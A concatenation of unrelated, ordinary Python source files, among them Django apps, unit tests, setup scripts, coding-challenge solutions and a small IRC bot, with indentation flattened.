# for i in range(1, len(nodes)):
# res = TreeNode(val=nodes[i], right=res)
#
# return res
def increasingBST2(self, root):
"""Python 3's yield from"""
def dfs(tree):
if tree:
yield from dfs(tree.left)
yield tree.val
yield from dfs(tree.right)
res = cur = TreeNode()
for x in dfs(root):
cur.right = TreeNode(x)
cur = cur.right
return res.right
def increasingBST3(self, root):
def dfs(tree):
if tree:
dfs(tree.left)
tree.left = None
self.cur.right = tree
self.cur = tree
dfs(tree.right)
res = self.cur = TreeNode()
dfs(root)
return res.right
|
from swag_client.migrations.versions import v2
def run_migration(data, version_start, version_end):
"""Runs migration against a data set."""
items = []
if version_start == 1 and version_end == 2:
for item in data['accounts']:
items.append(v2.upgrade(item))
if version_start == 2 and version_end == 1:
for item in data:
items.append(v2.downgrade(item))
items = {'accounts': items}
return items
|
from django.db import models
import datetime as dt
from cloudinary.models import CloudinaryField
from django.contrib.auth.models import User
from django.urls import reverse
from django.db.models.signals import post_save
# Create your models here.
class FlashCards(models.Model):
title = models.CharField(max_length=50, blank=True, null=True)
name = models.CharField(max_length =30)
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="flashcards", blank=True,null=True)
description = models.TextField(max_length =200, blank=True, null=True)
pub_date = models.DateTimeField(auto_now_add=True, blank=True, null=True)
category = models.CharField(max_length=200, blank=True, null=True)
image = models.ImageField(upload_to='media/', blank=True, null=True, default='default.jpg')
images = CloudinaryField('images')
def __str__(self):
return str(self.name)
def save_flash_cards(self):
self.save()
def delete_flash_cards(self):
self.delete()
@classmethod
def update_flash_cards(cls, id, value):
cls.objects.filter(id=id).update(name = value)
def get_absolute_url(self):
return reverse('index')
|
# Load in our dependencies
from unittest import TestCase
import httpretty
import requests
import httpretty_fixtures
# Set up multiple fixture managers
class FakeServer(httpretty_fixtures.FixtureManager):
@httpretty_fixtures.get('http://localhost:9000/')
def hello(self, request, uri, res_headers):
return (200, res_headers, 'world')
@httpretty_fixtures.get('http://localhost:9000/goodbye')
def goodbye(self, request, uri, res_headers):
return (200, res_headers, 'moon')
class CounterServer(httpretty_fixtures.FixtureManager):
def __init__(self):
self.count = 0
super(CounterServer, self).__init__()
@httpretty_fixtures.get('http://localhost:9000/')
def counter(self, request, uri, res_headers):
self.count += 1
return (200, res_headers, str(self.count))
# Define our tests
class TestHttprettyFixtures(TestCase):
@FakeServer.run(['hello'])
def test_request(self, fake_server):
"""
A request to a non-existant server behind a running FixtureManager
receives a response from FixtureManager
collects the request for later access
"""
# Make our request
res = requests.get('http://localhost:9000/')
self.assertEqual(res.status_code, 200)
# Assert the content is as expected
self.assertEqual(res.text, 'world')
# Assert we have information in our requests from `httpretty` context
self.assertEqual(httpretty_fixtures.first_request().path, '/')
self.assertEqual(httpretty_fixtures.last_request().path, '/')
self.assertEqual(len(httpretty_fixtures.requests()), 1)
self.assertEqual(httpretty_fixtures.requests()[0].path, '/')
# Assert we have information in our requests from fixture context
fixture = fake_server.hello
self.assertEqual(fixture.first_request.path, '/')
self.assertEqual(fixture.last_request.path, '/')
self.assertEqual(len(fixture.requests), 1)
self.assertEqual(fixture.requests[0].path, '/')
@FakeServer.run(['hello'])
def test_multiple_requests(self, fake_server):
"""
Multiple requests to a running FixtureManager
collects separate requests
"""
# Make our request
res = requests.get('http://localhost:9000/?first')
self.assertEqual(res.status_code, 200)
res = requests.get('http://localhost:9000/?second')
self.assertEqual(res.status_code, 200)
# Assert we have information in our requests from `httpretty` context
self.assertEqual(httpretty_fixtures.first_request().path, '/?first')
self.assertEqual(httpretty_fixtures.last_request().path, '/?second')
self.assertEqual(len(httpretty_fixtures.requests()), 2)
self.assertEqual(httpretty_fixtures.requests()[0].path, '/?first')
self.assertEqual(httpretty_fixtures.requests()[1].path, '/?second')
# Assert we have information in our requests from fixture context
fixture = fake_server.hello
self.assertEqual(fixture.first_request.path, '/?first')
self.assertEqual(fixture.last_request.path, '/?second')
self.assertEqual(len(fixture.requests), 2)
self.assertEqual(fixture.requests[0].path, '/?first')
self.assertEqual(fixture.requests[1].path, '/?second')
@FakeServer.run(['hello', 'goodbye'])
def test_multiple_fixtures_requests(self, fake_server):
"""
Requests to a running FixtureManager for different fixtures
receive response from appropriate endpoint
collects separate requests
"""
# Make our requests
res1 = requests.get('http://localhost:9000/?first')
self.assertEqual(res1.status_code, 200)
self.assertEqual(res1.text, 'world')
res2 = requests.get('http://localhost:9000/goodbye?second')
self.assertEqual(res2.status_code, 200)
self.assertEqual(res2.text, 'moon')
# Assert we have information in our requests from `httpretty` context
self.assertEqual(httpretty_fixtures.first_request().path, '/?first')
self.assertEqual(httpretty_fixtures.last_request().path, '/goodbye?second')
self.assertEqual(len(httpretty_fixtures.requests()), 2)
self.assertEqual(httpretty_fixtures.requests()[0].path, '/?first')
self.assertEqual(httpretty_fixtures.requests()[1].path, '/goodbye?second')
# Assert we have information in our requests from fixture context
fixture1 = fake_server.hello
self.assertEqual(fixture1.first_request.path, '/?first')
self.assertEqual(fixture1.last_request.path, '/?first')
self.assertEqual(len(fixture1.requests), 1)
self.assertEqual(fixture1.requests[0].path, '/?first')
fixture2 = fake_server.goodbye
self.assertEqual(fixture2.first_request.path, '/goodbye?second')
self.assertEqual(fixture2.last_request.path, '/goodbye?second')
self.assertEqual(len(fixture2.requests), 1)
self.assertEqual(fixture2.requests[0].path, '/goodbye?second')
@CounterServer.run(['counter'])
def test_state_preserved(self, counter_server):
"""
Multiple stateful requests to a running FixtureManager
receive appropriate state
"""
# Make our first request and verify its count
res = requests.get('http://localhost:9000/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, '1')
# Make our second request and verify its count
res = requests.get('http://localhost:9000/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, '2')
@CounterServer.run(['counter'])
def test_state_disjoint(self, counter_server):
"""
A separately running FixtureManager
does not receive state from past runs
"""
# Verifies that we don't get bleed from `test_state_preserved`
res = requests.get('http://localhost:9000/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, '1')
def test_nesting(self):
"""
When nesting calls to FixtureManager.start
we keep HTTPretty enabled until the last FixtureManager is stopped
"""
# We have not started yet
self.assertEqual(httpretty.is_enabled(), False)
# Start one manager, we get a `nested_count = 1`
CounterServer.start(['counter'])
self.assertEqual(httpretty.is_enabled(), True)
# Start a second manager, we get a `nested_count = 2`
FakeServer.start(['hello'])
self.assertEqual(httpretty.is_enabled(), True)
# We stop the second manager, which gets us `nested_count = 1`
# As well, HTTPretty should still be running
FakeServer.stop()
self.assertTrue(httpretty.is_enabled())
# We stop our last manager, which gives us `nested_count = 0`
CounterServer.stop()
# We finally stop HTTPretty since the last fixture manager is stopped
self.assertFalse(httpretty.is_enabled())
def test_httpretty_enabled_outside_fixture_manager(self):
"""
When HTTPretty was started outside of FixtureManager
we do not disable HTTPretty when the last FixtureManager is stopped
"""
# Start HTTPretty manually
httpretty.enable()
self.assertEqual(httpretty.is_enabled(), True)
# Start one of our FixtureManagers
FakeServer.start(['hello'])
self.assertEqual(FakeServer.httpretty_enabled_at_start, True)
self.assertEqual(httpretty.is_enabled(), True)
# Stop out FixtureManger and ensure HTTPretty is still running
FakeServer.stop()
self.assertEqual(FakeServer.nested_count, 0)
self.assertEqual(httpretty.is_enabled(), True)
# Disable HTTPretty manually and ensure it is stopped
httpretty.disable()
self.assertEqual(httpretty.is_enabled(), False)
|
from setuptools import setup, find_packages
setup(
name = "ci-metric-push",
version = "0.1",
packages = find_packages(),
scripts = ['pushci'],
install_requires = [
'librato-metrics==0.4.11',
'docopt==0.6.2',
'PyYAML==3.11',
'coloredlogs==0.5',
],
author = "Tomaz Kovacic",
author_email = "tomaz.kovacic@gmail.com",
description = "Push metrics about your code from your CI container to [ librato | statsd | ...] ",
license = "MIT",
keywords = "ci metric push",
url = "https://github.com/tomazk/ci-metric-push", # project home page, if any
) |
# Generated by Django 2.0.2 on 2020-08-17 02:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('services', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='services',
options={'ordering': ['-created'], 'verbose_name': 'Servicio', 'verbose_name_plural': 'Servicios'},
),
migrations.AlterField(
model_name='services',
name='content',
field=models.TextField(verbose_name='Contenido'),
),
]
|
def normalize_RTL(src: str):
"""
check if a string contains any non-english letters, and if so, return it appended by itself backwards
This is so it would be easy to read hebrew titles
"""
if not src.isascii():
return src + ' (' + src[::-1] + ')'
return src
_safe_chars = frozenset(" ._,-'")
def safe_filename(src: str):
"""scrub a filename, replace every non alphanumeric character with a whitespace"""
return "".join(
(c if (c.isalnum() or c in _safe_chars) else ' ')
for c in src).strip()
|
#!/usr/bin/env python3
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
setup(name='stringcontext',
version='1.0.0',
description='Get the context around an index location in a string',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/wesinator/stringcontext',
author='wesinator',
author_email='13hurdw@gmail.com',
packages=['stringcontext'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
],
zip_safe=True)
|
#!/usr/bin/env python3
import sys
import os
PROJECT_TITLE = "PoliRural: Contributions"
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def rel(*x):
return os.path.join(BASE_DIR, *x)
# Ensure loggind directory.
LOG_DIR_NAME = 'log'
LOG_DIR = rel(LOG_DIR_NAME)
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
# Loggers
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s %(levelname)s] [%(module)s.%(name)s %(funcName)s:%(lineno)s] %(message)s",
'datefmt': "%Y-%m-%d %H:%M:%S %z",
},
'semiverbose': {
'format': "[%(asctime)s %(levelname)s] [%(funcName)s] %(message)s",
'datefmt': "%Y-%m-%d %H:%M:%S %z",
},
'standard': {
'format': "[%(asctime)s %(levelname)s] %(message)s",
'datefmt': "%Y-%m-%d %H:%M:%S %z",
},
'simple': {
"format" : "[%(asctime)s %(levelname)s] %(message)s",
'datefmt': "%H:%M:%S %z",
}
},
'filters': {},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple',
'level': 'DEBUG',
},
'default': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': rel('log', 'app.log'),
'maxBytes': 1024*1024*5, # 5 MB
'backupCount': 1,
'formatter': 'standard',
},
'error': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': rel('log', 'error.log'),
'maxBytes': 1024*1024*20, # 20 MB
'backupCount': 1,
'formatter': 'verbose',
},
},
'root': {
'handlers': ['console'],
'level': 'DEBUG'
},
'loggers': {
'default': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': False,
},
'error': {
'handlers': ['error'],
'level': 'DEBUG',
'propagate': False,
},
'console': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
}
}
|
"""
Application settings
"""
from .config.db import db
from .config.flask import Config
from .router import * |
from boa.blockchain.vm.Neo.Runtime import Notify
from pkg.models.storage import Storage
class Counter():
KEY = 'counter'
def get(self) -> int:
Notify('Counter.get triggered.')
storage = Storage()
result = storage.get(self.KEY)
if (result == None):
return 0
else:
return result
return result
def up(self) -> None:
Notify('Counter.up triggered.')
current_count = self.get()
new_count = current_count + 1
storage = Storage()
storage.put(self.KEY, new_count)
return None
def down(self) -> None:
Notify('Counter.down triggered.')
current_count = self.get()
new_count = current_count - 1
storage = Storage()
storage.put(self.KEY, new_count)
return None
|
from pyDS.stack import Stack
import unittest
class TestStack(unittest.TestCase):
def setUp(self):
self.stack = Stack()
def test_empty_stack(self):
self.assertTrue(self.stack.isEmpty())
def test_stack_push(self):
self.stack.push(2)
self.assertEqual(self.stack._items, [2])
def test_non_empty_stack(self):
self.stack.push(5)
self.assertFalse(self.stack.isEmpty())
def test_stack_length(self):
self.stack.push(2)
self.assertEqual(len(self.stack), 1)
def test_stack_peek(self):
self.stack.push(2)
self.assertEqual(self.stack.peek(), 2)
def test_stack_pop(self):
self.stack.push(2)
self.assertEqual(self.stack.pop(), 2)
def test_empty_stack_pop(self):
with self.assertRaises(ValueError):
self.stack.pop()
def test_empty_stack_peek(self):
with self.assertRaises(ValueError):
self.stack.peek()
def test_stack_str_representation(self):
self.stack.push(2)
self.stack.push(4)
self.assertEqual(str(self.stack),"2 4")
|
from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^$', views.index, name='home'),
url(r'^user/(?P<username>\w+)', views.profile, name='profile'),
url(r'^upload/$', views.upload_image, name='upload_image'),
url(r'^accounts/edit/',views.edit_profile, name='edit_profile'),
url(r'^image/(?P<image_id>\d+)', views.single_image, name='single_image'),
url(r'^search/', views.search, name='search'),
url(r'^like/(?P<operation>.+)/(?P<pk>\d+)',views.like, name='like'),
url(r"^profile/update/$", views.update_profile, name = "update_profile"),
url(r"^accounts/profile/$",views.index, name = 'home')
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
import os
import logging
import json
from zinc.models import ZincIndex, ZincManifest, ZincFlavorSpec
from zinc.catalog import ZincCatalogPathHelper
from zinc.defaults import defaults
from zinc.catalog import ZincCatalog
from zinc.storages import StorageBackend
from zinc.client import connect, create_bundle_version
import zinc.helpers as helpers
import zinc.utils as utils
from tests import *
# TODO: relocate
class StorageBackendTestCase(unittest.TestCase):
def setUp(self):
self.storage = StorageBackend()
def test_get_raises(self):
self.assertRaises(NotImplementedError, self.storage.get, 'foo')
def test_get_meta_raises(self):
self.assertRaises(NotImplementedError, self.storage.get_meta, 'foo')
def test_put_raises(self):
self.assertRaises(NotImplementedError, self.storage.put, 'foo', 'bar')
def create_catalog_at_path(path, id):
service = connect('/')
service.create_catalog(id=id, loc=path)
catalog = service.get_catalog(loc=path)
return catalog
class ZincCatalogPathHelperTestCase(unittest.TestCase):
def setUp(self):
self.pathHelper = ZincCatalogPathHelper()
def test_config_dir(self):
self.assertEquals(self.pathHelper.config_dir, "config")
def test_config_flavors_spec_dir(self):
self.assertEquals(self.pathHelper.config_flavorspec_dir, "config/flavorspecs")
def test_path_for_flavor_spec_name(self):
flavor_spec_name = "games"
expected_path = "config/flavorspecs/%s.json" % flavor_spec_name
actual_path = self.pathHelper.path_for_flavorspec_name(flavor_spec_name)
self.assertEquals(expected_path, actual_path)
class ZincCatalogTestCase(TempDirTestCase):
def setUp(self):
super(ZincCatalogTestCase, self).setUp()
self.catalog_dir = os.path.join(self.dir, "catalog")
os.mkdir(self.catalog_dir)
self.scratch_dir = os.path.join(self.dir, "scratch")
os.mkdir(self.scratch_dir)
logging.info("catalog: %s" % self.catalog_dir)
logging.info("scratch: %s" % self.scratch_dir)
def path_exists_in_catalog(self, subpath):
fullpath = os.path.join(self.catalog_dir, subpath)
return os.path.exists(fullpath)
def test_catalog_create(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
self.assertTrue(catalog is not None)
self.assertTrue(len(catalog.index.bundle_names()) == 0)
self.assertTrue(catalog.format() == defaults['zinc_format'])
def test_catalog_read_invalid_format(self):
create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
index_path = os.path.join(self.catalog_dir, defaults['catalog_index_name'])
index = ZincIndex.from_path(index_path)
index._format = 2
index.write(index_path)
self.assertRaises(Exception, ZincCatalog, (self.catalog_dir))
def test_catalog_import_file(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
f1 = create_random_file(self.scratch_dir)
catalog.import_path(f1)
def test_bundle_names_with_no_bundles(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
self.assertTrue(len(catalog.index.bundle_names()) == 0)
def test_versions_for_nonexistant_bundle(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
versions = catalog.index.versions_for_bundle("meep")
self.assertTrue(len(versions) == 0)
def _build_test_catalog(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
create_random_file(self.scratch_dir)
create_bundle_version(catalog, "meep", self.scratch_dir)
catalog._reload() # TODO: fix/remove/something
return catalog
def test_create_bundle_version(self):
catalog = self._build_test_catalog()
self.assertTrue("meep" in catalog.get_index().bundle_names())
self.assertTrue(1 in catalog.get_index().versions_for_bundle("meep"))
manifest = catalog.manifest_for_bundle("meep", 1)
self.assertTrue(manifest is not None)
for (file, props) in manifest.files.items():
sha = props['sha']
formats = props['formats']
for format in formats.keys():
ext = None
if format == 'gz':
ext = 'gz'
object_path = ZincCatalogPathHelper().path_for_file_with_sha(sha, ext)
self.assertTrue(self.path_exists_in_catalog(object_path))
def test_bundle_name_in_manifest(self):
catalog = self._build_test_catalog()
bundle_name = "meep"
manifest = catalog.manifest_for_bundle(bundle_name, 1)
self.assertTrue(manifest.bundle_name == bundle_name)
def test_create_bundle_with_subdirs(self):
create_random_file(self.scratch_dir)
one_dir = os.mkdir(os.path.join(self.scratch_dir, "one"))
create_random_file(one_dir)
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_bundle_version(catalog, "meep", self.scratch_dir)
def test_create_second_bundle_version(self):
catalog = self._build_test_catalog()
# add a file
create_random_file(self.scratch_dir)
create_bundle_version(catalog, "meep", self.scratch_dir)
self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
new_index = ZincIndex.from_path(os.path.join(catalog.path, defaults['catalog_index_name']))
self.assertTrue(1 in new_index.versions_for_bundle("meep"))
self.assertTrue(2 in new_index.versions_for_bundle("meep"))
def test_create_duplicate_bundle_version_no_force(self):
catalog = self._build_test_catalog()
# add a file
create_random_file(self.scratch_dir)
# create first version
manifest1 = create_bundle_version(catalog, "meep", self.scratch_dir)
self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
# attempt to create same version again
manifest2 = create_bundle_version(catalog, "meep", self.scratch_dir)
self.assertEquals(manifest1.version, manifest2.version)
def test_create_duplicate_bundle_version_with_force(self):
catalog = self._build_test_catalog()
# add a file
create_random_file(self.scratch_dir)
# create first version
manifest1 = create_bundle_version(catalog, "meep", self.scratch_dir)
self.assertTrue(2 in catalog.get_index().versions_for_bundle("meep"))
# attempt to create same version again, with force
manifest2 = create_bundle_version(catalog, "meep", self.scratch_dir,
force=True)
self.assertNotEquals(manifest1.version, manifest2.version)
def test_create_identical_bundle_version(self):
catalog = self._build_test_catalog()
create_bundle_version(catalog, "meep", self.scratch_dir)
self.assertEquals(len(catalog.get_index().versions_for_bundle("meep")), 1)
def test_path_for_manifest_with_name_version(self):
catalog = self._build_test_catalog()
manifest = ZincManifest(catalog.index.id, 'zoo', 1)
path = ZincCatalogPathHelper().path_for_manifest(manifest)
filename = os.path.split(path)[-1]
self.assertEquals(filename, 'zoo-1.json')
def test_single_file_bundle_does_not_create_archive(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
create_bundle_version(catalog, "meep", self.scratch_dir)
archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
self.assertFalse(self.path_exists_in_catalog(archive_path))
def test_more_than_one_file_bundle_does_create_archive(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
create_random_file(self.scratch_dir)
create_bundle_version(catalog, "meep", self.scratch_dir)
archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
self.assertTrue(self.path_exists_in_catalog(archive_path))
def test_single_file_flavor_does_not_create_archive(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
flavor_spec = ZincFlavorSpec.from_dict({'dummy': ['+ *']})
create_bundle_version(catalog, "meep", self.scratch_dir,
flavor_spec=flavor_spec)
archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1,
flavor='dummy')
self.assertFalse(self.path_exists_in_catalog(archive_path))
def test_skip_master_archive_and_no_flavor_specified(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
create_random_file(self.scratch_dir)
create_bundle_version(catalog, "meep", self.scratch_dir,
skip_master_archive=True)
archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
self.assertTrue(self.path_exists_in_catalog(archive_path))
def test_skip_master_archive_and_flavor_specified(self):
catalog = create_catalog_at_path(self.catalog_dir, 'com.mindsnacks.test')
create_random_file(self.scratch_dir)
create_random_file(self.scratch_dir)
flavor_spec = ZincFlavorSpec.from_dict({'dummy': ['+ *']})
create_bundle_version(catalog, "meep", self.scratch_dir,
flavor_spec=flavor_spec, skip_master_archive=True)
archive_path = ZincCatalogPathHelper().path_for_archive_for_bundle_version("meep", 1)
self.assertFalse(self.path_exists_in_catalog(archive_path))
def test_update_distro_basic(self):
# set up
catalog = self._build_test_catalog()
bundle_name, distro = "meep", "master"
# create 'master' distro at v1
catalog.update_distribution(distro, bundle_name, 1)
# verify
version = catalog.index.version_for_bundle(bundle_name, distro)
self.assertEquals(version, 1)
def test_save_prev_distro_if_no_previous(self):
# set up
catalog = self._build_test_catalog()
bundle_name, distro = "meep", "master"
# create 'master' distro at v1
catalog.update_distribution(distro, bundle_name, 1)
# verify
prev_distro = helpers.distro_previous_name(distro)
prev_version = catalog.index.version_for_bundle(bundle_name, prev_distro)
self.assertTrue(prev_version is None)
def test_save_prev_distro_if_prev_exists(self):
# set up
catalog = self._build_test_catalog()
bundle_name, distro = "meep", "master"
# create 'master' distro at v1
catalog.update_distribution(distro, bundle_name, 1)
# create a bundle version 2
create_random_file(self.scratch_dir)
create_bundle_version(catalog, bundle_name, self.scratch_dir)
# update 'master' distro to v2
catalog.update_distribution(distro, bundle_name, 2)
# verify
prev_distro = helpers.distro_previous_name(distro)
prev_version = catalog.index.version_for_bundle(bundle_name, prev_distro)
self.assertEquals(prev_version, 1)
def add_dummy_flavorspec(self, catalog, flavorspec_name):
flavorspec_string = json.dumps({'dummy': ['+ *']})
subpath = catalog.path_helper.path_for_flavorspec_name(flavorspec_name)
catalog._storage.puts(subpath, flavorspec_string)
def test_update_flavorspec(self):
#set up
catalog = self._build_test_catalog()
flavorspec_string = json.dumps({'dummy': ['+ *']})
# add the flavorspec
catalog.update_flavorspec_from_json_string("dummy", flavorspec_string)
# verify
expected_path = catalog._ph.path_for_flavorspec_name("dummy")
self.path_exists_in_catalog(expected_path)
def test_list_flavorspec(self):
# set up
catalog = self._build_test_catalog()
self.add_dummy_flavorspec(catalog, "test")
# get list
actual_names = catalog.get_flavorspec_names()
# verify
self.assertEquals(["test"], actual_names)
def test_delete_flavorspec(self):
# set up
catalog = self._build_test_catalog()
self.add_dummy_flavorspec(catalog, "test")
# delete flavorspec
catalog.delete_flavorspec("test")
# verify
subpath = catalog.path_helper.path_for_flavorspec_name("test")
self.assertFalse(os.path.exists(os.path.join(self.dir, subpath)))
|
import os
import re
import csv
def convert_directory_to_csv(directory, polarity, out_file_path):
data = {}
data["sentence"] = []
data["sentiment"] = []
with open(out_file_path, "a") as csvfile:
writer = csv.writer(csvfile)
for file_path in os.listdir(directory):
with open(os.path.join(directory, file_path), "r") as f:
sentence = f.read()
sentiment = re.match("\d+_(\d+)\.txt", file_path).group(1)
writer.writerow([sentence, sentiment, str(polarity)])
def convert_dataset(directory):
out_path = os.path.join("resources", "{}.csv".format(directory))
with open(out_path, "w") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["sentence", "sentiment", "polarity"])
convert_directory_to_csv(os.path.join("resources", "aclImdb", directory, "pos"), 1, out_path)
convert_directory_to_csv(os.path.join("resources", "aclImdb", directory, "neg"), 0, out_path)
def main():
convert_dataset("train")
convert_dataset("test")
if __name__ == '__main__':
main()
|
from django import forms
from .models import ShopOrder
class ShopOrderForm(forms.ModelForm):
class Meta:
model = ShopOrder
fields = ('full_name', 'email_address', 'phone_number',
'address_line1', 'address_line2', 'town_or_city',
'county_or_region', 'postcode', 'country',)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
placeholders = {
'full_name': 'Full Name',
'email_address': 'Email Address',
'phone_number': 'Phone Number',
'address_line1': 'Address Line 1',
'address_line2': 'Address Line 2',
'town_or_city': 'Town or City',
'county_or_region': 'County or Region',
'postcode': 'Postcode',
}
self.fields['full_name'].widget.attrs['autofocus'] = True
for field in self.fields:
if field != 'country':
if self.fields[field].required:
placeholder = f'{placeholders[field]}'
else:
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
self.fields[field].widget.attrs['class'] = 'stripe-style-input'
self.fields[field].label = False
|
import django
from django.core.management import call_command
from django.test import TestCase
from mock import patch
class MigrationTests(TestCase):
def test_no_migrations_created(self):
with patch('sys.exit') as exit_mocked:
if django.VERSION < (1, 10):
# django < 1.10 uses an "exit" param that works the opposite from django > 1.10's check param
call_command('makemigrations', 'herald', dry_run=True, exit=True, verbosity=0)
exit_mocked.assert_called_with(1)
else:
call_command('makemigrations', 'herald', dry_run=True, check=True, verbosity=0)
exit_mocked.assert_not_called()
|
from unittest import mock
from assertpy import assert_that
from django.conf import settings
from snapshottest.django import TestCase
from opening_hours.enums import ResourceType
from opening_hours.resources import (
Resource,
send_resource_to_hauki,
update_hauki_resource,
)
class SendResourceToHaukiTestCase(TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.resource = Resource(
id=None,
name="Test Resource",
description="",
address="",
children=[],
parents=[1],
organization="1234",
origin_id="4321",
origin_data_source_name="DataSource",
origin_data_source_id="dts",
)
def get_send_response(self):
return {
"id": 1,
"name": self.resource.name,
"description": "",
"address": None,
"resource_type": self.resource.resource_type.value,
"children": self.resource.children,
"parents": self.resource.parents,
"organization": self.resource.organization,
"origins": [
{
"data_source": {
"id": self.resource.origin_data_source_id,
"name": self.resource.origin_data_source_name,
},
"origin_id": self.resource.origin_id,
}
],
"extra_data": {},
"is_public": True,
"timezone": "Europe/Helsinki",
}
@mock.patch("opening_hours.resources.make_hauki_post_request")
def test_send(self, send_mock):
send_mock.return_value = self.get_send_response()
settings.HAUKI_API_URL = "themagicapiurl"
settings.HAUKI_API_KEY = "verysecretcode"
data = send_resource_to_hauki(self.resource)
assert_that(data).is_not_none()
assert_that(data.id).is_not_none()
@mock.patch("opening_hours.resources.make_hauki_put_request")
def test_update(self, put_mock):
data = self.resource.convert_to_request_data()
resource = Resource(
id=1,
name=data["name"],
description=data["description"],
address=data["address"],
resource_type=ResourceType.RESERVABLE,
children=data["children"],
parents=data["parents"],
organization=data["organization"],
origin_id=data["origins"][0]["origin_id"],
origin_data_source_name=data["origins"][0]["data_source"]["name"],
origin_data_source_id=data["origins"][0]["data_source"]["id"],
)
put_mock.return_value = self.get_send_response()
settings.HAUKI_API_URL = "themagicapiurl"
settings.HAUKI_API_KEY = "verysecretcode"
data = update_hauki_resource(resource)
assert_that(data).is_not_none()
assert_that(data.id).is_not_none()
@mock.patch("opening_hours.resources.make_hauki_put_request")
def test_update_raises_when_no_resource_id(self, put_mock):
put_mock.return_value = self.get_send_response()
settings.HAUKI_API_URL = "themagicapiurl"
settings.HAUKI_API_KEY = "verysecretcode"
with self.assertRaises(ValueError):
update_hauki_resource(self.resource)
|
#!/bin/python3
def surfaceArea(A):
# The function is expected to return an INTEGER.
# The function accepts 2D_INTEGER_ARRAY A as parameter.
area = 0
height = len(A)
width = len(A[0])
# Step 1. Top and bottom
area += sum(2 for row in A for n in row if n > 0)
# Step 2. For each level, area of the figure
for level in range(max(n for row in A for n in row)):
for y in range(height):
for x in range(width):
if A[y][x] - 1 < level:
continue
for (dy, dx) in [[-1, 0], [1, 0], [0, -1], [0, 1]]:
is_out_of_map = not ((0 <= y + dy < height) and (0 <= x + dx < width))
is_shorter_than_level = not is_out_of_map and A[y + dy][x + dx] - 1 < level
if is_out_of_map or is_shorter_than_level:
area += 1
return area
if __name__ == "__main__":
first_multiple_input = input().rstrip().split()
H = int(first_multiple_input[0])
W = int(first_multiple_input[1])
A = []
for _ in range(H):
A.append(list(map(int, input().rstrip().split())))
print(surfaceArea(A))
|
# Copyright (c) 2012-2018 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the COPYING file.
""" Extract a binary toolchain package """
# FIXME: deal with the cyclic-import in a dedicated issue
# pylint: disable=cyclic-import
import os
from qisys import ui
import qisys.parsers
import qitoolchain.qipackage
def configure_parser(parser):
qisys.parsers.default_parser(parser)
parser.add_argument("package_path",
help="Path to the package to extract")
parser.add_argument("-o", "--output", dest="output",
help="Where to extract the files (default: working directory")
def do(args):
package_path = args.package_path
output = args.output or os.getcwd()
qipackage = None
try:
qipackage = qitoolchain.qipackage.from_archive(package_path)
except Exception:
pass
res = None
if qipackage:
name = qipackage.name
if qipackage.target:
name += "-" + qipackage.target
if qipackage.version:
name += "-" + qipackage.version
dest = os.path.join(output, name)
res = qitoolchain.qipackage.extract(package_path, dest)
else:
res = qisys.archive.extract(package_path, output)
ui.info(ui.green, "Package extracted to", ui.reset, ui.bold, res)
return res
|
# -*- coding: utf-8 -*-
from sopel import module
from sopel.module import commands
import random
import re
@commands("ping")
def normal_ping(bot, trigger):
bot.say("Pong!")
@commands("pong")
def normal_pong(bot, trigger):
bot.say("Ping!")
@commands("linel")
def normal_linel(bot, trigger):
bot.say("Ese men es mi brother <3 by Xenial")
@commands("status")
def normal_status(bot, trigger):
bot.say("Estado del bot: Operativo")
@commands("xenial")
def normal_status(bot, trigger):
bot.say("Un Espaรฑol que desarrollo XeniBot")
@commands("estado")
def normal_estado(bot, trigger):
bot.say("Estado del bot: Operativo")
